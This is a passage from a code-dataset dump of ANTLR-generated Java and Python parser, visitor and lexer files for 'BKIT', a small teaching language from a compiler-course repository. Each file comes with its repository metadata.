getRuleContext(IdsContext.class,0);\n\t\t}\n\t\tpublic IdsContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_ids; }\n\t}\n\n\tpublic final IdsContext ids() throws RecognitionException {\n\t\tIdsContext _localctx = new IdsContext(_ctx, getState());\n\t\tenterRule(_localctx, 10, RULE_ids);\n\t\ttry {\n\t\t\tsetState(34);\n\t\t\t_errHandler.sync(this);\n\t\t\tswitch ( getInterpreter().adaptivePredict(_input,1,_ctx) ) {\n\t\t\tcase 1:\n\t\t\t\tenterOuterAlt(_localctx, 
1);\n\t\t\t\t{\n\t\t\t\tsetState(30);\n\t\t\t\tmatch(ID);\n\t\t\t\tsetState(31);\n\t\t\t\tmatch(T__1);\n\t\t\t\tsetState(32);\n\t\t\t\tids();\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 2:\n\t\t\t\tenterOuterAlt(_localctx, 2);\n\t\t\t\t{\n\t\t\t\tsetState(33);\n\t\t\t\tmatch(ID);\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static final String _serializedATN =\n\t\t\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\7\\'\\4\\2\\t\\2\\4\\3\\t\"+\n\t\t\"\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\\3\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\"+\n\t\t\"\\3\\4\\5\\4\\31\\n\\4\\3\\5\\3\\5\\3\\5\\3\\5\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\3\\7\\5\\7%\\n\\7\\3\\7\\2\"+\n\t\t\"\\2\\b\\2\\4\\6\\b\\n\\f\\2\\3\\3\\2\\5\\6\\2\\\"\\2\\16\\3\\2\\2\\2\\4\\21\\3\\2\\2\\2\\6\\30\\3\\2\\2\"+\n\t\t\"\\2\\b\\32\\3\\2\\2\\2\\n\\36\\3\\2\\2\\2\\f$\\3\\2\\2\\2\\16\\17\\5\\4\\3\\2\\17\\20\\7\\2\\2\\3\\20\"+\n\t\t\"\\3\\3\\2\\2\\2\\21\\22\\5\\b\\5\\2\\22\\23\\5\\6\\4\\2\\23\\5\\3\\2\\2\\2\\24\\25\\5\\b\\5\\2\\25\\26\"+\n\t\t\"\\5\\6\\4\\2\\26\\31\\3\\2\\2\\2\\27\\31\\3\\2\\2\\2\\30\\24\\3\\2\\2\\2\\30\\27\\3\\2\\2\\2\\31\\7\"+\n\t\t\"\\3\\2\\2\\2\\32\\33\\5\\n\\6\\2\\33\\34\\5\\f\\7\\2\\34\\35\\7\\3\\2\\2\\35\\t\\3\\2\\2\\2\\36\\37\"+\n\t\t\"\\t\\2\\2\\2\\37\\13\\3\\2\\2\\2 !\\7\\7\\2\\2!\\\"\\7\\4\\2\\2\\\"%\\5\\f\\7\\2#%\\7\\7\\2\\2$ \\3\\2\"+\n\t\t\"\\2\\2$#\\3\\2\\2\\2%\\r\\3\\2\\2\\2\\4\\30$\";\n\tpublic static final ATN _ATN =\n\t\tnew ATNDeserializer().deserialize(_serializedATN.toCharArray());\n\tstatic {\n\t\t_decisionToDFA = new DFA[_ATN.getNumberOfDecisions()];\n\t\tfor (int i = 0; i < _ATN.getNumberOfDecisions(); i++) {\n\t\t\t_decisionToDFA[i] = new DFA(_ATN.getDecisionState(i), i);\n\t\t}\n\t}\n}" }, { "alpha_fraction": 
0.6904126405715942, "alphanum_fraction": 0.692465603351593, "avg_line_length": 34.050357818603516, "blob_id": "b297f6117696db3c37b1ccd164e6460c82629835", "content_id": "f16e11b5dae0ba254537fcfa0931549695b28d89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4871, "license_type": "no_license", "max_line_length": 116, "num_lines": 139, "path": "/SyntaxAnalysis/tut/target/main/bkit/parser/BKITBaseVisitor.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.tree.AbstractParseTreeVisitor;\n\n/**\n * This class provides an empty implementation of {@link BKITVisitor},\n * which can be extended to create a visitor which only needs to handle a subset\n * of the available methods.\n *\n * @param <T> The return type of the visit operation. Use {@link Void} for\n * operations with no return type.\n */\npublic class BKITBaseVisitor<T> extends AbstractParseTreeVisitor<T> implements BKITVisitor<T> {\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitProgram(BKITParser.ProgramContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitVar_declare(BKITParser.Var_declareContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitFunction_declare(BKITParser.Function_declareContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t 
*/\n\t@Override public T visitFunction_body(BKITParser.Function_bodyContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitIds_list_with_type(BKITParser.Ids_list_with_typeContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitStmt(BKITParser.StmtContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitAssign_stmt(BKITParser.Assign_stmtContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitCall_stmt(BKITParser.Call_stmtContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitRet_stmt(BKITParser.Ret_stmtContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExprs_list(BKITParser.Exprs_listContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr(BKITParser.ExprContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of 
calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr0(BKITParser.Expr0Context ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr1(BKITParser.Expr1Context ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr2(BKITParser.Expr2Context ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitSubexpr(BKITParser.SubexprContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitOperand(BKITParser.OperandContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitIds_list(BKITParser.Ids_listContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitPrimitive_type(BKITParser.Primitive_typeContext ctx) { return visitChildren(ctx); }\n}" }, { "alpha_fraction": 0.5331836938858032, "alphanum_fraction": 0.5685421824455261, "avg_line_length": 30.513275146484375, "blob_id": "b1f1eae1623299a6c2b1838ce3eb5681b0495fd8", "content_id": "dbf6742aac2c1f2708fd1d21816790295c1c4cf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 7127, "license_type": "no_license", "max_line_length": 103, "num_lines": 226, "path": "/LexicalAnalysis/target/main/bkit/parser/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\21\")\n buf.write(\"\\25\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\3\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\")\n buf.write(\"\\3\\3\\4\\6\\4\\21\\n\\4\\r\\4\\16\\4\\22\\3\\4\\2\\2\\5\\2\\4\\6\\2\\3\\3\\2\")\n buf.write(\"\\4\\5\\2\\22\\2\\b\\3\\2\\2\\2\\4\\13\\3\\2\\2\\2\\6\\20\\3\\2\\2\\2\\b\\t\\7\")\n buf.write(\"\\13\\2\\2\\t\\n\\7\\2\\2\\3\\n\\3\\3\\2\\2\\2\\13\\f\\7\\13\\2\\2\\f\\r\\7\\6\")\n buf.write(\"\\2\\2\\r\\16\\7\\b\\2\\2\\16\\5\\3\\2\\2\\2\\17\\21\\t\\2\\2\\2\\20\\17\\3\\2\")\n buf.write(\"\\2\\2\\21\\22\\3\\2\\2\\2\\22\\20\\3\\2\\2\\2\\22\\23\\3\\2\\2\\2\\23\\7\\3\")\n buf.write(\"\\2\\2\\2\\3\\22\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"':'\", \"';'\", \"'.'\", \"','\", \"'Var'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"STRING\", \"Real_number\", \"Integer_number\", \n \"Ids_list\", \"COLON\", \"SEMI\", \"DOT\", \"COMMA\", \"VAR\", \n \"ILLEGAL_ESCAPE\", \"WS\", \"UNCLOSE_STRING\", \"ERROR_CHAR\", \n \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n RULE_program = 0\n RULE_var_declaration = 1\n RULE_number = 2\n\n ruleNames = [ 
\"program\", \"var_declaration\", \"number\" ]\n\n EOF = Token.EOF\n STRING=1\n Real_number=2\n Integer_number=3\n Ids_list=4\n COLON=5\n SEMI=6\n DOT=7\n COMMA=8\n VAR=9\n ILLEGAL_ESCAPE=10\n WS=11\n UNCLOSE_STRING=12\n ERROR_CHAR=13\n BLOCK_COMMENT=14\n UNTERMINATED_COMMENT=15\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 6\n self.match(BKITParser.VAR)\n self.state = 7\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declarationContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def Ids_list(self):\n return self.getToken(BKITParser.Ids_list, 0)\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return 
BKITParser.RULE_var_declaration\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declaration\" ):\n return visitor.visitVar_declaration(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declaration(self):\n\n localctx = BKITParser.Var_declarationContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declaration)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 9\n self.match(BKITParser.VAR)\n self.state = 10\n self.match(BKITParser.Ids_list)\n self.state = 11\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class NumberContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Real_number(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.Real_number)\n else:\n return self.getToken(BKITParser.Real_number, i)\n\n def Integer_number(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.Integer_number)\n else:\n return self.getToken(BKITParser.Integer_number, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_number\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitNumber\" ):\n return visitor.visitNumber(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def number(self):\n\n localctx = BKITParser.NumberContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_number)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 14 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 13\n _la = self._input.LA(1)\n if not(_la==BKITParser.Real_number or _la==BKITParser.Integer_number):\n self._errHandler.recoverInline(self)\n else:\n 
self._errHandler.reportMatch(self)\n self.consume()\n self.state = 16 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.Real_number or _la==BKITParser.Integer_number):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.30758678913116455, "alphanum_fraction": 0.6180588603019714, "avg_line_length": 57.24517822265625, "blob_id": "a76a8a0b5655358499f91f01d2289d398fdcccaf", "content_id": "50c57ea92ba84bed024b7365bfbc23213704fea7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 21142, "license_type": "no_license", "max_line_length": 97, "num_lines": 363, "path": "/LexicalAnalysis/BKITLexer.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from BKIT.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.Lexer;\nimport org.antlr.v4.runtime.CharStream;\nimport org.antlr.v4.runtime.Token;\nimport org.antlr.v4.runtime.TokenStream;\nimport org.antlr.v4.runtime.*;\nimport org.antlr.v4.runtime.atn.*;\nimport org.antlr.v4.runtime.dfa.DFA;\nimport org.antlr.v4.runtime.misc.*;\n\n@SuppressWarnings({\"all\", \"warnings\", \"unchecked\", \"unused\", \"cast\"})\npublic class BKITLexer extends Lexer {\n\tstatic { RuntimeMetaData.checkVersion(\"4.8\", RuntimeMetaData.VERSION); }\n\n\tprotected static final DFA[] _decisionToDFA;\n\tprotected static final PredictionContextCache _sharedContextCache =\n\t\tnew PredictionContextCache();\n\tpublic static final int\n\t\tREAL_NUMBER=1, ID=2, ILLEGAL_ESCAPE=3, UNCLOSE_STRING=4, COMMENT=5, UNTERMINATED_COMMENT=6, \n\t\tERROR_CHAR=7, WS=8, Integer_literal=9, Float_literal=10, Boolean_literal=11, \n\t\tString_literal=12, BODY=13, BREAK=14, CONTINUE=15, DO=16, ELSE=17, ELSELF=18, \n\t\tELSEIF=19, ENDBODY=20, ENDFOR=21, ENDWHILE=22, FOR=23, FUNCTION=24, 
IF=25, \n\t\tPARAMETER=26, RETURN=27, THEN=28, VAR=29, WHILE=30, TRUE=31, FALSE=32, \n\t\tENDDO=33, PLUS_INT=34, PLUS_FLOAT=35, MINUS_INT=36, MINUS_FLOAT=37, STAR_INT=38, \n\t\tSTAR_FLOAT=39, DIV_INT=40, DIV_FLOAT=41, MOD=42, NOT=43, AND=44, OR=45, \n\t\tEQUAL=46, NOT_EQUAL_INT=47, LESS_INT=48, GREATER_INT=49, LESS_OR_EQUAL_INT=50, \n\t\tGREATER_OR_EQUAL_INT=51, NOT_EQUAL_FLOAT=52, LESS_FLOAT=53, GREATER_FLOAT=54, \n\t\tLESS_OR_EQUAL_FLOAT=55, GREATER_OR_EQUAL_FLOAT=56, LEFT_PAREN=57, RIGHT_PARENT=58, \n\t\tLEFT_BRACKET=59, RIGHT_BRACKET=60, LEFT_BRACE=61, RIGHT_BRACE=62, COLON=63, \n\t\tDOT=64, SEMI=65, COMMA=66;\n\tpublic static String[] channelNames = {\n\t\t\"DEFAULT_TOKEN_CHANNEL\", \"HIDDEN\"\n\t};\n\n\tpublic static String[] modeNames = {\n\t\t\"DEFAULT_MODE\"\n\t};\n\n\tprivate static String[] makeRuleNames() {\n\t\treturn new String[] {\n\t\t\t\"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n\t\t\t\"ERROR_CHAR\", \"WS\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \n\t\t\t\"LETTER\", \"SIGN\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n\t\t\t\"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \"STRING_CHAR\", \n\t\t\t\"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \"DECIMAL\", \"OCTAL\", \n\t\t\t\"DOUBLE_QUOTE\", \"Integer_literal\", \"Float_literal\", \"Boolean_literal\", \n\t\t\t\"String_literal\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \n\t\t\t\"ELSEIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n\t\t\t\"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \n\t\t\t\"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \n\t\t\t\"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n\t\t\t\"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", 
\"NOT_EQUAL_FLOAT\", \n\t\t\t\"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \n\t\t\t\"LEFT_PAREN\", \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n\t\t\t\"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\"\n\t\t};\n\t}\n\tpublic static final String[] ruleNames = makeRuleNames();\n\n\tprivate static String[] makeLiteralNames() {\n\t\treturn new String[] {\n\t\t\tnull, null, null, null, null, null, null, null, null, null, null, null, \n\t\t\tnull, \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElSelf'\", \n\t\t\t\"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n\t\t\t\"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \"'True'\", \n\t\t\t\"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \n\t\t\t\"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \n\t\t\t\"'<='\", \"'>='\", \"'=\\\\='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \n\t\t\t\"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\"\n\t\t};\n\t}\n\tprivate static final String[] _LITERAL_NAMES = makeLiteralNames();\n\tprivate static String[] makeSymbolicNames() {\n\t\treturn new String[] {\n\t\t\tnull, \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n\t\t\t\"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \"Float_literal\", \n\t\t\t\"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \n\t\t\t\"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \n\t\t\t\"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n\t\t\t\"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n\t\t\t\"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", 
\n\t\t\t\"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n\t\t\t\"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \n\t\t\t\"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \"RIGHT_PARENT\", \"LEFT_BRACKET\", \n\t\t\t\"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \n\t\t\t\"COMMA\"\n\t\t};\n\t}\n\tprivate static final String[] _SYMBOLIC_NAMES = makeSymbolicNames();\n\tpublic static final Vocabulary VOCABULARY = new VocabularyImpl(_LITERAL_NAMES, _SYMBOLIC_NAMES);\n\n\t/**\n\t * @deprecated Use {@link #VOCABULARY} instead.\n\t */\n\t@Deprecated\n\tpublic static final String[] tokenNames;\n\tstatic {\n\t\ttokenNames = new String[_SYMBOLIC_NAMES.length];\n\t\tfor (int i = 0; i < tokenNames.length; i++) {\n\t\t\ttokenNames[i] = VOCABULARY.getLiteralName(i);\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = VOCABULARY.getSymbolicName(i);\n\t\t\t}\n\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = \"<INVALID>\";\n\t\t\t}\n\t\t}\n\t}\n\n\t@Override\n\t@Deprecated\n\tpublic String[] getTokenNames() {\n\t\treturn tokenNames;\n\t}\n\n\t@Override\n\n\tpublic Vocabulary getVocabulary() {\n\t\treturn VOCABULARY;\n\t}\n\n\n\tpublic BKITLexer(CharStream input) {\n\t\tsuper(input);\n\t\t_interp = new LexerATNSimulator(this,_ATN,_decisionToDFA,_sharedContextCache);\n\t}\n\n\t@Override\n\tpublic String getGrammarFileName() { return \"BKIT.g4\"; }\n\n\t@Override\n\tpublic String[] getRuleNames() { return ruleNames; }\n\n\t@Override\n\tpublic String getSerializedATN() { return _serializedATN; }\n\n\t@Override\n\tpublic String[] getChannelNames() { return channelNames; }\n\n\t@Override\n\tpublic String[] getModeNames() { return modeNames; }\n\n\t@Override\n\tpublic ATN getATN() { return _ATN; }\n\n\t@Override\n\tpublic void action(RuleContext _localctx, int ruleIndex, int actionIndex) {\n\t\tswitch (ruleIndex) {\n\t\tcase 
29:\n\t\t\tString_literal_action((RuleContext)_localctx, actionIndex);\n\t\t\tbreak;\n\t\t}\n\t}\n\tprivate void String_literal_action(RuleContext _localctx, int actionIndex) {\n\t\tswitch (actionIndex) {\n\t\tcase 0:\n\n\t\t\t\t\tString s = this.text;\n\t\t\t\t\tthis.text = \"123123\";\t\n\t\t\t\t\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tpublic static final String _serializedATN =\n\t\t\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2D\\u022b\\b\\1\\4\\2\\t\"+\n\t\t\"\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\"+\n\t\t\"\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\"+\n\t\t\"\\4\\23\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\\t\\31\"+\n\t\t\"\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\"+\n\t\t\"\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4\"+\n\t\t\",\\t,\\4-\\t-\\4.\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\\t\"+\n\t\t\"\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\\4;\\t;\\4<\\t<\\4=\\t=\"+\n\t\t\"\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\tC\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\"+\n\t\t\"\\tI\\4J\\tJ\\4K\\tK\\4L\\tL\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\"+\n\t\t\"\\4U\\tU\\3\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\7\\3\\u00b2\\n\\3\\f\\3\\16\\3\\u00b5\\13\\3\\3\\4\\3\"+\n\t\t\"\\4\\7\\4\\u00b9\\n\\4\\f\\4\\16\\4\\u00bc\\13\\4\\3\\4\\3\\4\\3\\5\\3\\5\\7\\5\\u00c2\\n\\5\\f\\5\"+\n\t\t\"\\16\\5\\u00c5\\13\\5\\3\\5\\5\\5\\u00c8\\n\\5\\3\\6\\3\\6\\3\\6\\3\\6\\7\\6\\u00ce\\n\\6\\f\\6\\16\"+\n\t\t\"\\6\\u00d1\\13\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00dc\\n\\7\\f\\7\\16\"+\n\t\t\"\\7\\u00df\\13\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\t\\6